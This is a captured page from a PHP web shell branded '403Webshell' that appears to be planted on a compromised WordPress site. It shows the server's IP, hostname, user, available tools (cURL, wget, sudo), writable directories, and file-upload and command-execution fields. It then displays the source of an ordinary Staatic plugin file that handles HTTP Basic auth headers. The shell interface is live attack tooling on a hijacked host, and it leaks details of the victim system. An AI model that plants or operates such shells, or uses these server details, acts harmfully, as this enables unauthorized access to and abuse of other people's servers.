403Webshell
Server IP : 185.252.147.100  /  Your IP : 216.73.217.33
Web Server : nginx/1.27.3
System : Linux mitrofanov.ru 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
User : mitr ( 1000)
PHP Version : 8.2.29
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /www/html/east-point.site/public/wp-content/plugins/staatic/src/Module/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/html/east-point.site/public/wp-content/plugins/staatic/src/Module/HttpAuthHeaders.php
<?php

declare(strict_types=1);

namespace Staatic\WordPress\Module;

use Staatic\WordPress\Setting\Advanced\HttpAuthenticationPasswordSetting;
use Staatic\WordPress\Setting\Advanced\HttpAuthenticationUsernameSetting;

final class HttpAuthHeaders implements ModuleInterface
{
    /**
     * @var HttpAuthenticationUsernameSetting
     */
    private $httpAuthUsername;

    /**
     * @var HttpAuthenticationPasswordSetting
     */
    private $httpAuthPassword;

    public function __construct(HttpAuthenticationUsernameSetting $httpAuthUsername, HttpAuthenticationPasswordSetting $httpAuthPassword)
    {
        $this->httpAuthUsername = $httpAuthUsername;
        $this->httpAuthPassword = $httpAuthPassword;
    }

    public function hooks(): void
    {
        add_filter('cron_request', [$this, 'updateCronRequest'], 10);
        add_filter('http_request_args', [$this, 'updateHttpRequestArgs'], 10, 2);
    }

    /**
     * @param mixed[] $cronRequest
     */
    public function updateCronRequest($cronRequest): array
    {
        $httpAuthUsername = $this->httpAuthUsername->value();
        $httpAuthPassword = $this->httpAuthPassword->value();
        if (!$httpAuthUsername && !$httpAuthPassword) {
            return $cronRequest;
        }
        $cronRequest['args']['headers']['Authorization'] = sprintf(
            'Basic %s',
            base64_encode("{$httpAuthUsername}:{$httpAuthPassword}")
        );

        return $cronRequest;
    }

    /**
     * @param mixed[] $args
     */
    public function updateHttpRequestArgs($args, $url): array
    {
        $httpAuthUsername = $this->httpAuthUsername->value();
        $httpAuthPassword = $this->httpAuthPassword->value();
        if (!$httpAuthUsername && !$httpAuthPassword) {
            return $args;
        }
        if (!is_string($url) || !$this->isRequestToSelf($url)) {
            return $args;
        }
        $args['headers']['Authorization'] = sprintf(
            'Basic %s',
            base64_encode("{$httpAuthUsername}:{$httpAuthPassword}")
        );

        return $args;
    }

    private function isRequestToSelf(string $url): bool
    {
        $requestHost = parse_url($url, \PHP_URL_HOST);
        if (!$requestHost) {
            return \false;
        }
        if ($requestHost === 'localhost') {
            return \true;
        }
        $siteHost = parse_url(get_option('siteurl'), \PHP_URL_HOST);
        if ($siteHost && $siteHost === $requestHost) {
            return \true;
        }

        return \false;
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit